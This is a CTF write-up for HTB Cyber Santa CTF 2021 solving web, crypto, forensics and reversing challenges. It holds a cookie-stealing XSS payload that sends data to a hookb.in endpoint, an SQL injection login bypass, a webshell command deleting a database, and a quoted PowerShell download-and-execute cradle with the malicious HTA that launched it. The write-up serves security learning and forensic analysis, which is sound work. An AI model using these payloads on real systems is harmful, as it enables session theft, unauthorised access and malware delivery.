HTB Cyber Santa CTF 2021 - Write-up

Information#

Version#

By Version Comment
noraj 1.0 Creation

CTF#

  • Name : HTB Cyber Santa CTF 2021
  • Website : hackthebox.com
  • Type : Online
  • Format : Jeopardy
  • CTF Time : link

Day 1 - 01/12/2021#

Toy Workshop - Web#

Source code analysis#

We can download and review the source code of the app.

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$ tree web_toy_workshop
β”œβ”€β”€ build-docker.sh
β”œβ”€β”€ challenge
β”‚ β”œβ”€β”€ bot.js
β”‚ β”œβ”€β”€ database.js
β”‚ β”œβ”€β”€ index.js
β”‚ β”œβ”€β”€ package.json
β”‚ β”œβ”€β”€ routes
β”‚ β”‚ └── index.js
β”‚ β”œβ”€β”€ static
β”‚ β”‚ β”œβ”€β”€ audio
β”‚ β”‚ β”‚ └── audio.mp3
β”‚ β”‚ β”œβ”€β”€ css
β”‚ β”‚ β”‚ β”œβ”€β”€ bootstrap.min.css
β”‚ β”‚ β”‚ β”œβ”€β”€ dashboard.css
β”‚ β”‚ β”‚ β”œβ”€β”€ index.css
β”‚ β”‚ β”‚ β”œβ”€β”€ remodal.css
β”‚ β”‚ β”‚ └── remodal-default-theme.css
β”‚ β”‚ β”œβ”€β”€ images
β”‚ β”‚ β”‚ β”œβ”€β”€ ballset.png
β”‚ β”‚ β”‚ β”œβ”€β”€ ballset.png~
β”‚ β”‚ β”‚ β”œβ”€β”€ bayblade.png~
β”‚ β”‚ β”‚ β”œβ”€β”€ bearset.png
β”‚ β”‚ β”‚ β”œβ”€β”€ bearset.png~
β”‚ β”‚ β”‚ β”œβ”€β”€ bin2.png
β”‚ β”‚ β”‚ β”œβ”€β”€ bin2.png~
β”‚ β”‚ β”‚ β”œβ”€β”€ cflower.png
β”‚ β”‚ β”‚ β”œβ”€β”€ elf1.png
β”‚ β”‚ β”‚ β”œβ”€β”€ elf2.png
β”‚ β”‚ β”‚ β”œβ”€β”€ gameset.png
β”‚ β”‚ β”‚ β”œβ”€β”€ gameset.png~
β”‚ β”‚ β”‚ β”œβ”€β”€ logo.png
β”‚ β”‚ β”‚ β”œβ”€β”€ santa-loading.gif
β”‚ β”‚ β”‚ β”œβ”€β”€ sign_post.png
β”‚ β”‚ β”‚ β”œβ”€β”€ trainset.png
β”‚ β”‚ β”‚ └── trainset.png~
β”‚ β”‚ └── js
β”‚ β”‚ β”œβ”€β”€ bootstrap.min.js
β”‚ β”‚ β”œβ”€β”€ conveyor.js
β”‚ β”‚ β”œβ”€β”€ index.js
β”‚ β”‚ β”œβ”€β”€ jquery-3.6.0.min.js
β”‚ β”‚ └── remodal.min.js
β”‚ └── views
β”‚ β”œβ”€β”€ index.hbs
β”‚ └── queries.hbs
β”œβ”€β”€ config
β”‚ └── supervisord.conf
└── Dockerfile

9 directories, 38 files

By reading /challenge/routes/index.js we can find the routes of the app.

The two routes that are interesting are the following:

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router.post('/api/submit', async (req, res) => {

const { query } = req.body;
if(query){
return db.addQuery(query)
.then(() => {
bot.readQueries(db);
res.send(response('Your message is delivered successfully!'));
});
}
return res.status(403).send(response('Please write your query first!'));
});

router.get('/queries', async (req, res, next) => {
if(req.ip != '127.0.0.1') return res.redirect('/');

return db.getQueries()
.then(queries => {
res.render('queries', { queries });
})
.catch(() => res.status(500).send(response('Something went wrong!')));
});

Also the following chunk of code in /challenge/bot.js allow us to understand that a bot will consult the queries page.

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const readQueries = async (db) => {
const browser = await puppeteer.launch(browser_options);
let context = await browser.createIncognitoBrowserContext();
let page = await context.newPage();
await page.goto('http://127.0.0.1:1337/');
await page.setCookie(...cookies);
await page.goto('http://127.0.0.1:1337/queries', {
waitUntil: 'networkidle2'
});
await browser.close();
await db.migrate();
};

We can't browse the /queries endpoint directly because it can be viewed only from localhost. So we have to submit a query to the API and wait for the bot to browse it. We see that the bot as a cookie containing the flag so our goal will be to steal that cookie.

This JavaScript payload will retrieve unprotected cookies and make a request to an attacker controlled endpoint to exfiltrate the cookie.

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<script>new Image().src="https://hookb.in/Mq2WRx6kojSDRWppRMgo/?c="+document.cookie;</script>

Query:

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POST /api/submit HTTP/1.1
Host: 178.128.35.31:30621
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://178.128.35.31:30621/
Content-Type: application/json
Origin: http://178.128.35.31:30621
Content-Length: 107
Connection: close

{"query":"<script>new Image().src=\"https://hookb.in/Mq2WRx6kojSDRWppRMgo/?c=\"+document.cookie;</script>"}

Retrieved cookie:

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flag=HTB{3v1l_3lv3s_4r3_r1s1ng_up!}

Common Mistake - Crypto#

It looks like RSA parameters and cipher text encoded in hexadecimal.

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{'n': '0xa96e6f96f6aedd5f9f6a169229f11b6fab589bf6361c5268f8217b7fad96708cfbee7857573ac606d7569b44b02afcfcfdd93c21838af933366de22a6116a2a3dee1c0015457c4935991d97014804d3d3e0d2be03ad42f675f20f41ea2afbb70c0e2a79b49789131c2f28fe8214b4506db353a9a8093dc7779ec847c2bea690e653d388e2faff459e24738cd3659d9ede795e0d1f8821fd5b49224cb47ae66f9ae3c58fa66db5ea9f73d7b741939048a242e91224f98daf0641e8a8ff19b58fb8c49b1a5abb059f44249dfd611515115a144cc7c2ca29357af46a9dc1800ae9330778ff1b7a8e45321147453cf17ef3a2111ad33bfeba2b62a047fa6a7af0eef', 'e': '0x10001', 'ct': '0x55cfe232610aa54dffcfb346117f0a38c77a33a2c67addf7a0368c93ec5c3e1baec9d3fe35a123960edc2cbdc238f332507b044d5dee1110f49311efc55a2efd3cf041bfb27130c2266e8dc61e5b99f275665823f584bc6139be4c153cdcf153bf4247fb3f57283a53e8733f982d790a74e99a5b10429012bc865296f0d4f408f65ee02cf41879543460ffc79e84615cc2515ce9ba20fe5992b427e0bbec6681911a9e6c6bbc3ca36c9eb8923ef333fb7e02e82c7bfb65b80710d78372a55432a1442d75cad5b562209bed4f85245f0157a09ce10718bbcef2b294dffb3f00a5a804ed7ba4fb680eea86e366e4f0b0a6d804e61a3b9d57afb92ecb147a769874'}
{'n': '0xa96e6f96f6aedd5f9f6a169229f11b6fab589bf6361c5268f8217b7fad96708cfbee7857573ac606d7569b44b02afcfcfdd93c21838af933366de22a6116a2a3dee1c0015457c4935991d97014804d3d3e0d2be03ad42f675f20f41ea2afbb70c0e2a79b49789131c2f28fe8214b4506db353a9a8093dc7779ec847c2bea690e653d388e2faff459e24738cd3659d9ede795e0d1f8821fd5b49224cb47ae66f9ae3c58fa66db5ea9f73d7b741939048a242e91224f98daf0641e8a8ff19b58fb8c49b1a5abb059f44249dfd611515115a144cc7c2ca29357af46a9dc1800ae9330778ff1b7a8e45321147453cf17ef3a2111ad33bfeba2b62a047fa6a7af0eef', 'e': '0x23', 'ct': '0x79834ce329453d3c4af06789e9dd654e43c16a85d8ba0dfa443aefe1ab4912a12a43b44f58f0b617662a459915e0c92a2429868a6b1d7aaaba500254c7eceba0a2df7144863f1889fab44122c9f355b74e3f357d17f0e693f261c0b9cefd07ca3d1b36563a8a8c985e211f9954ce07d4f75db40ce96feb6c91211a9ff9c0a21cad6c5090acf48bfd88042ad3c243850ad3afd6c33dd343c793c0fa2f98b4eabea399409c1966013a884368fc92310ebcb3be81d3702b936e7e883eeb94c2ebb0f9e5e6d3978c1f1f9c5a10e23a9d3252daac87f9bb748c961d3d361cc7dacb9da38ab8f2a1595d7a2eba5dce5abee659ad91a15b553d6e32d8118d1123859208'}

We can convert the hexadecimal to decimal with ctf-party. For example:

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irb(main):002:0> '0xa96e6f96f6aedd5f9f6a169229f11b6fab589bf6361c5268f8217b7fad96708cfbee7857573ac606d7569b44b02afcfcfdd93c21838af933366de22a6116a2a3dee1c0015457c4935991d97014804d3d3e0d2be03ad42f675f20f41ea2afbb70c0e2a79b49789131c2f28fe8214b4506db353a9a8093dc7779ec847c2bea690e653d388e2faff459e24738cd3659d9ede795e0d1f8821fd5b49224cb47ae66f9ae3c58fa66db5ea9f73d7b741939048a242e91224f98daf0641e8a8ff19b58fb8c49b1a5abb059f44249dfd611515115a144cc7c2ca29357af46a9dc1800ae9330778ff1b7a8e45321147453cf17ef3a2111ad33bfeba2b62a047fa6a7af0eef'.hex2dec(prefix: '0x')
=> "21388731509885000178627064516258054470260331371598943108291856742436111736828979864010924669228672392691259110152052179841234423220373839350729519449867096270377366080249815393746878871366061153796079471618562067885157333408378773203102328726963273544788844541658368239189745882391132838451159906995037703318134437625750463265571575001855682002307507556141914223053440116920635522540306152978955166077383503077296996797116492665606386925464305499727852298454712455680910133707466125522128546462287576144499756117801116464261543533542827392699481765864054797509983998681705356909524163419157085924159390221747612487407"
irb(main):002:0> '0x23'.hex2dec(prefix: '0x')
=> "35"
irb(main):001:0> '0x10001'.hex2dec(prefix: '0x')
=> "65537"
irb(main):001:0> '0x55cfe232610aa54dffcfb346117f0a38c77a33a2c67addf7a0368c93ec5c3e1baec9d3fe35a123960edc2cbdc238f332507b044d5dee1110f49311efc55a2efd3cf041bfb27130c2266e8dc61e5b99f275665823f584bc6139be4c153cdcf153bf4247fb3f57283a53e8733f982d790a74e99a5b10429012bc865296f0d4f408f65ee02cf41879543460ffc79e84615cc2515ce9ba20fe5992b427e0bbec6681911a9e6c6bbc3ca36c9eb8923ef333fb7e02e82c7bfb65b80710d78372a55432a1442d75cad5b562209bed4f85245f0157a09ce10718bbcef2b294dffb3f00a5a804ed7ba4fb680eea86e366e4f0b0a6d804e61a3b9d57afb92ecb147a769874'.hex2dec(prefix: '0x')
=> "10832767136661619622293208748444962392355211301390434120939858183061348121126484914263671262032603875084667844823015664447375648718327494489656817860025737727356822703892293211022320699697919627907394583787345038714333739600698382532854618636094930253033489471351451429607353151015568123268427367950348329135569722792929241394325167453525160818746481257803112384890621897151307914147207385945644054978785846514561379487923125221730977998641404608153621221989242862072038048891093337039913905830269768414927334743978508494831586214464123847828971941221037875260516473982025116976142753481691811417555124564400023181428"
irb(main):002:0> '0x79834ce329453d3c4af06789e9dd654e43c16a85d8ba0dfa443aefe1ab4912a12a43b44f58f0b617662a459915e0c92a2429868a6b1d7aaaba500254c7eceba0a2df7144863f1889fab44122c9f355b74e3f357d17f0e693f261c0b9cefd07ca3d1b36563a8a8c985e211f9954ce07d4f75db40ce96feb6c91211a9ff9c0a21cad6c5090acf48bfd88042ad3c243850ad3afd6c33dd343c793c0fa2f98b4eabea399409c1966013a884368fc92310ebcb3be81d3702b936e7e883eeb94c2ebb0f9e5e6d3978c1f1f9c5a10e23a9d3252daac87f9bb748c961d3d361cc7dacb9da38ab8f2a1595d7a2eba5dce5abee659ad91a15b553d6e32d8118d1123859208'.hex2dec(prefix: '0x')
=> "15339581512280546253022387613330506135473528946217386214104392886174532962135139018179028980415602501799731665623533337161466343141774695260798342966907592969192136730428838101668117599627074424456369362732331025534652310626217911372168741784410233370188819015541694457313359727564553135243865091813543574169503409997765186767976316668351998243685484183615633052413572395870658899189135714137152486690320920884963915388873421509027812888500063744545503640233833759600980489533968220839778372130766115290961393758948141655306677776381429819578626575875511596616706688649422193432129579216085481063417748767088461582856"

Let's conduct a Common Modulus Attack with RSHack. Here the install instruction for BlackArch Linux.

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$ sudo pacman -S rshack

Attack:

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$ rshack


#########################
# RSHack v2.1 #
# Zweisamkeit #
# GNU GPL v3 #
#########################



List of the available attacks:

1. Wiener Attack
2. Hastad Attack
3. Fermat Attack
4. Bleichenbacher Attack
5. Common Modulus Attack
6. Chosen Plaintext Attack

List of the available tools:

a. RSA Public Key parameters extraction
b. RSA Private Key parameters extraction
c. RSA Private Key construction (PEM)
d. RSA Public Key construction (PEM)
e. RSA Ciphertext Decipher
f. RSA Ciphertext Encipher

[*] What attack or tool do you want to carry out? 5

***** Common Modulus Attack *****

[*] Arguments [-h] -n common modulus -e1 first exponent -e2 second exponent -c1 first cipher -c2 second cipher:

-n 21388731509885000178627064516258054470260331371598943108291856742436111736828979864010924669228672392691259110152052179841234423220373839350729519449867096270377366080249815393746878871366061153796079471618562067885157333408378773203102328726963273544788844541658368239189745882391132838451159906995037703318134437625750463265571575001855682002307507556141914223053440116920635522540306152978955166077383503077296996797116492665606386925464305499727852298454712455680910133707466125522128546462287576144499756117801116464261543533542827392699481765864054797509983998681705356909524163419157085924159390221747612487407 -e1 65537 -e2 35 -c1 10832767136661619622293208748444962392355211301390434120939858183061348121126484914263671262032603875084667844823015664447375648718327494489656817860025737727356822703892293211022320699697919627907394583787345038714333739600698382532854618636094930253033489471351451429607353151015568123268427367950348329135569722792929241394325167453525160818746481257803112384890621897151307914147207385945644054978785846514561379487923125221730977998641404608153621221989242862072038048891093337039913905830269768414927334743978508494831586214464123847828971941221037875260516473982025116976142753481691811417555124564400023181428 -c2 15339581512280546253022387613330506135473528946217386214104392886174532962135139018179028980415602501799731665623533337161466343141774695260798342966907592969192136730428838101668117599627074424456369362732331025534652310626217911372168741784410233370188819015541694457313359727564553135243865091813543574169503409997765186767976316668351998243685484183615633052413572395870658899189135714137152486690320920884963915388873421509027812888500063744545503640233833759600980489533968220839778372130766115290961393758948141655306677776381429819578626575875511596616706688649422193432129579216085481063417748767088461582856


~~~~~~~~~~~~~~~~~~~~~~~~~
Common Modulus Attack
Zweisamkeit
GNU GPL v3 License
~~~~~~~~~~~~~~~~~~~~~~~~~


[+] Decimal plaintext: 154494104151501230741951698942733388017524925426108770319061863579333462036794337421344018523054973

[+] Interpreted plaintext: HTB{c0mm0n_m0d_4774ck_15_4n07h3r_cl4ss1c}

baby APT - Forensics#

It's a network forensics challenge where we'll have to analyse the captured traffic recorded in a pcap.

We can filtrer on HTTP frames or use the Export HTTP object feature.

A webshell named bg.php is access several times and the attacker is sending commands to it.

One of the commands seems obfuscated, but ctf-party can once again help us to decode the URL components and base64 decode it.

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$ ctf-party 'cmd=rm++%2Fvar%2Fwww%2Fhtml%2Fsites%2Fdefault%2Ffiles%2F.ht.sqlite+%26%26+echo+SFRCezBrX24wd18zdjNyeTBuM19oNHNfdDBfZHIwcF8wZmZfdGgzaXJfbDN0dDNyc180dF90aDNfcDBzdF8wZmYxYzNfNGc0MW59+%3E+%2Fdev%2Fnull+2%3E%261+%26%26+ls+-al++%2Fvar%2Fwww%2Fhtml%2Fsites%2Fdefault%2Ffiles' urldecode
cmd=rm /var/www/html/sites/default/files/.ht.sqlite && echo SFRCezBrX24wd18zdjNyeTBuM19oNHNfdDBfZHIwcF8wZmZfdGgzaXJfbDN0dDNyc180dF90aDNfcDBzdF8wZmYxYzNfNGc0MW59 > /dev/null 2>&1 && ls -al /var/www/html/sites/default/files
$ ctf-party 'SFRCezBrX24wd18zdjNyeTBuM19oNHNfdDBfZHIwcF8wZmZfdGgzaXJfbDN0dDNyc180dF90aDNfcDBzdF8wZmYxYzNfNGc0MW59' from_b64
HTB{0k_n0w_3v3ry0n3_h4s_t0_dr0p_0ff_th3ir_l3tt3rs_4t_th3_p0st_0ff1c3_4g41n}

Mr Snowy - Pwn#

I didn't do it.

Infiltration - Reversing#

Just tracing the syscall made when connecting to a remote socket we can make the flag leak:

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$ strace rev_infiltration/client 178.128.46.48 32124
execve("rev_infiltration/client", ["rev_infiltration/client", "178.128.46.48", "32124"], 0x7ffe28abc7d0 /* 65 vars */) = 0
brk(NULL) = 0x5621147dd000
arch_prctl(0x3001 /* ARCH_??? */, 0x7ffeacdfa870) = -1 EINVAL (Invalid argument)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=149796, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 149796, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f149bc68000
close(3) = 0
openat(AT_FDCWD, "/usr/lib/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0`|\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0@\0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0"..., 80, 848) = 80
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0K@g7\5w\10\300\344\306B4Zp<G"..., 68, 928) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=2150424, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f149bc66000
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1880536, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f149ba9a000
mmap(0x7f149bac0000, 1355776, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7f149bac0000
mmap(0x7f149bc0b000, 311296, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x171000) = 0x7f149bc0b000
mmap(0x7f149bc57000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1bc000) = 0x7f149bc57000
mmap(0x7f149bc5d000, 33240, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f149bc5d000
close(3) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f149ba98000
arch_prctl(ARCH_SET_FS, 0x7f149bc67580) = 0
mprotect(0x7f149bc57000, 12288, PROT_READ) = 0
mprotect(0x562114482000, 4096, PROT_READ) = 0
mprotect(0x7f149bcbb000, 8192, PROT_READ) = 0
munmap(0x7f149bc68000, 149796) = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(32124), sin_addr=inet_addr("178.128.46.48")}, 16) = 0
recvfrom(3, "X\16\201\226vg\33\374\304\0\212\2,\36\371\344\341{i\236\t\247B\324\30\20a\37I\301\332\34", 32, 0, NULL, NULL) = 32
sendto(3, "\34\332\301I\37a\20\30\324B\247\t\236i{\341\344\371\36,\2\212\0\304\374\33gv\226\201\16X", 32, 0, NULL, 0) = 32
recvfrom(3, "`:\326\364\0\261+C\252O\310\315y\270;\221\274!\r\344\200h\361\334L\20(\10\271\336Q\305", 32, 0, NULL, NULL) = 32
sendto(3, "|\340\27\275\37\320;[~\ro\304\347\321@pX\330\23\310\202\342\361\30\260\vO~/__\235", 32, 0, NULL, 0) = 32
recvfrom(3, "\0", 1, 0, NULL, NULL) = 1
recvfrom(3, "HTB{n0t_qu1t3_s0_0p4qu3}", 1024, 0, NULL, NULL) = 24
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x5), ...}, AT_EMPTY_PATH) = 0
brk(NULL) = 0x5621147dd000
brk(0x5621147fe000) = 0x5621147fe000
write(1, "[!] Untrusted Client Location - "..., 53[!] Untrusted Client Location - Enabling Opaque Mode
) = 53
exit_group(0) = ?
+++ exited with 0 +++

HTB{n0t_qu1t3_s0_0p4qu3}

Day 2 - 02/12/2021#

Toy Management - Web#

While unauthenticated we can only access a authentication form. We'll have to analyse the source code to identify an entry point.

Source code analysis#

In challenge/database.sql we can understand the database structure and where we'll have to look to find the flag.

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CREATE TABLE `toylist` (
`id` int NOT NULL,
`toy` varchar(256) NOT NULL,
`receiver` varchar(256) NOT NULL,
`location` varchar(256) NOT NULL,
`approved` int NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

INSERT INTO `toylist` (`id`, `toy`, `receiver`, `location`, `approved`) VALUES
(1, 'She-Ra, Princess of Power', 'Elaina Love', 'Houston', 1),
(2, 'Bayblade Burst Evolution', 'Jarrett Pace', 'Dallas', 1),
(3, 'Barbie Dreamhouse Playset', 'Kristin Vang', 'Austin', 1),
(4, 'StarWars Action Figures', 'Jaslyn Huerta', 'Amarillo', 1),
(5, 'Hot Wheels: Volkswagen Beach Bomb', 'Eric Cameron', 'San Antonio', 1),
(6, 'Polly Pocket dolls', 'Aracely Monroe', 'El Paso', 1),
(7, 'HTB{f4k3_fl4g_f0r_t3st1ng}', 'HTBer', 'HTBland', 0);

CREATE TABLE `users` (
`id` int NOT NULL,
`username` varchar(256) NOT NULL,
`password` varchar(256) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

INSERT INTO `users` (`id`, `username`, `password`) VALUES
(1, 'manager', '69bbdcd1f9feab7842f3a1c152062407'),
(2, 'admin', '592c094d5574fb32fe9d4cce27240588');

Let's look how the queries to the database are crafted in challenge/database.js:

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async listToys(approved=1) {
return new Promise(async (resolve, reject) => {
let stmt = `SELECT * FROM toylist WHERE approved = ?`;
this.connection.query(stmt, [approved], (err, result) => {
if(err)
reject(err)
try {
resolve(JSON.parse(JSON.stringify(result)))
}
catch (e) {
reject(e)
}
})

});
}

async loginUser(user, pass) {
return new Promise(async (resolve, reject) => {
let stmt = `SELECT username FROM users WHERE username = '${user}' and password = '${pass}'`;
this.connection.query(stmt, (err, result) => {
if(err)
reject(err)
try {
resolve(JSON.parse(JSON.stringify(result)))
}
catch (e) {
reject(e)
}
})
});
}

async getUser(user) {
return new Promise(async (resolve, reject) => {
let stmt = `SELECT * FROM users WHERE username = '${user}'`;
this.connection.query(stmt, (err, result) => {
if(err)
reject(err)
try {
resolve(JSON.parse(JSON.stringify(result)))
}
catch (e) {
reject(e)
}
})
});
}

listToys() will list the toys but only the approved ones and the flag is the only one that is not approved. loginUser() and getUser() are unsafe because they are conncatenating user input directly to the query so we'll be able to perform a SQL injection.

But by reading the routes in challenge/routes/index.js, we can see that if we are connected as admin, listToys() argument approved will be overriden with 0 value so it will list unapproved toys including the flag.

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router.get('/api/toylist', AuthMiddleware, async (req, res) => {
return db.getUser(req.data.username)
.then(user => {
approved = 1;
if (user[0].username == 'admin') approved = 0;
return db.listToys(approved)
.then(toyInfo => {
return res.json(toyInfo);
})
.catch(() => res.status(500).send(response('Something went wrong!')));
})
.catch(() => res.status(500).send(response('Something went wrong!')));
});

Exploitation: SQL injection#

Since the login request is vulnerable to SQLi, we are able to log in as admin just by using the following credentials:

  • admin'-- -
  • anything

forming this queries:

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SELECT username FROM users WHERE username = 'admin'-- -' and password = 'anything'

We can grab the flag from the dashboard: HTB{1nj3cti0n_1s_in3v1t4bl3}

XMAS Spirit - Crypto#

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#!/usr/bin/python3

import random
from math import gcd

def encrypt(dt):
mod = 256
while True:
a = random.randint(1,mod)
if gcd(a, mod) == 1: break
b = random.randint(1,mod)

res = b''
for byte in dt:
enc = (a*byte + b) % mod
res += bytes([enc])
return res

dt = open('letter.pdf', 'rb').read()

res = encrypt(dt)

f = open('encrypted.bin', 'wb')
f.write(res)
f.close()

We know that the source file is a PDF. There are very few combinations possible (255*255 maximum, or 255*128 keeping only the values when a is coprime with the modulus).

So what we can do is take the magic bytes (signature) of a PDF (5 bytes) and brute-force all values of a and b until we end back on the sames bytes as the encrypted document.

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require 'ctf_party' # https://github.com/noraj/ctf-party

encdata = File.read('letter.pdf.encrypted.bin')

encheader = encdata[0...5].to_hex.scan(/.{1,2}/)
signature = ['25','50','44','46','2D'] # '%PDF-'

(1..255).each do |i|
(1..255).each do |j|
res = []
signature.each do |byte|
clear = ((byte.hex2dec.to_i*i)+j) % 256
res << clear.chr.to_hex if (1..255).include?(clear)
end
puts "a=#{i}, b=#{j}" if res == encheader
end
end

Doing so I retrieved the value of a and b used to encrypt the file:

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$ ruby bf.rb
a=169, b=160

But after that I was unable to decrypt the file.

Honeypot - Forensics#

Let's see with Volatility3 if there are suspicious commands.

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$ vol -f honeypot.raw windows.cmdline
...
2700 powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
...

Let's decode the base64 encoded powershell payload:

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$ printf %s 'aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==' | base64 -d
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iex ((new-object net.webclient).downloadstring('https://windowsliveupdater.com/update.ps1'))

So here we have the full URL of the malware and the PID of the powershell (2700).

Let's list processes to see it's parents and childs.

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$ vol -f honeypot.raw windows.pslist | grep 2700
2700 3720 powershell.exe 0x8420dd28 13 444 2 False 2021-11-25 19:13:50.000000 N/A Disabled
4028 2700 whoami.exe 0x85d8db00 0 - 2 False 2021-11-25 19:14:01.000000 2021-11-25 19:14:01.000000 Disabled
4036 2700 HOSTNAME.EXE 0x84289030 0 - 2 False 2021-11-25 19:14:01.000000 2021-11-25 19:14:01.000000 Disabled

The parent 3720 doesn't not exists, so let's see the childs 4028 and 4036.

We know the downloaded powershell script is about update so let's find a file related to update.

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$ vol -f honeypot.raw windows.filescan | grep update
0x3e7c4c50 100.0\Windows\System32\Tasks\Microsoft\Windows\Media Center\mcupdate 128
0x3ee413b0 \Windows\System32\mcupdate_AuthenticAMD.dll 128
0x3f4d4348 \Users\Santa\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M3FMRSOD\christmas_update[1].hta 128

The last file looks interesting, let's download it.

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$ vol -f honeypot.raw windows.dumpfiles --physaddr 0x3f4d4348
Volatility 3 Framework 1.0.1
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result

DataSectionObject 0x3f4d4348 christmas_update[1].hta file.0x3f4d4348.0x84ac5568.DataSectionObject.christmas_update[1].hta.dat
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<html>
<head>
<HTA:APPLICATION id="Microsoft" applicationName="Christmas update"/>
<script>
var sh = new ActiveXObject("WScript.Shell");
sh.run('powershell.exe /window hidden /e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==');
window.close();
</script>
</html>

So it seems the powershell backdoor was launched by a malicious website with ActiveX. So the parent process 3720 was likely a web browser.

If we look at network connections we can see there are no foreign addresses associated with powershell.exe process or its childs.

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$ vol -f honeypot.raw windows.netscan
Volatility 3 Framework 1.0.1
Progress: 100.00 PDB scanning finished
Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created

0x23d04218 TCPv4 0.0.0.0 49155 0.0.0.0 0 LISTENING 400 services.exe N/A
0x23d04218 TCPv6 :: 49155 :: 0 LISTENING 400 services.exe N/A
0x2554b460 TCPv4 10.0.2.15 49226 93.184.220.29 80 ESTABLISHED - - -
0x261e9d30 TCPv4 10.0.2.15 49228 172.67.177.22 443 ESTABLISHED - - -
0x3e22f008 UDPv4 0.0.0.0 0 * 0 2080 svchost.exe 2021-11-25 19:12:23.000000
0x3e22f008 UDPv6 :: 0 * 0 2080 svchost.exe 2021-11-25 19:12:23.000000
0x3e238300 TCPv4 0.0.0.0 445 0.0.0.0 0 LISTENING 4 System N/A
0x3e238300 TCPv6 :: 445 :: 0 LISTENING 4 System N/A
0x3e24c588 UDPv4 0.0.0.0 0 * 0 2080 svchost.exe 2021-11-25 19:12:23.000000
0x3e281368 UDPv4 10.0.2.15 138 * 0 4 System 2021-11-25 19:12:23.000000
0x3e2a29b8 UDPv4 0.0.0.0 0 * 0 1084 svchost.exe 2021-11-25 19:12:23.000000
0x3e2a29b8 UDPv6 :: 0 * 0 1084 svchost.exe 2021-11-25 19:12:23.000000
0x3e2a6448 UDPv4 0.0.0.0 5355 * 0 1084 svchost.exe 2021-11-25 19:12:26.000000
0x3e2b5b88 TCPv4 10.0.2.15 139 0.0.0.0 0 LISTENING 4 System N/A
0x3e2e9cc0 TCPv4 10.0.2.15 49221 212.205.126.106 443 ESTABLISHED - - -
0x3e354618 UDPv6 fe80::256b:4013:4140:453f 546 * 0 744 svchost.exe 2021-11-25 19:12:31.000000
0x3e3b0c70 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3e5e4f50 UDPv4 0.0.0.0 5355 * 0 1084 svchost.exe 2021-11-25 19:12:26.000000
0x3e5e4f50 UDPv6 :: 5355 * 0 1084 svchost.exe 2021-11-25 19:12:26.000000
0x3e5f77a0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 1676 sshd.exe N/A
0x3e619578 TCPv4 0.0.0.0 49152 0.0.0.0 0 LISTENING 348 wininit.exe N/A
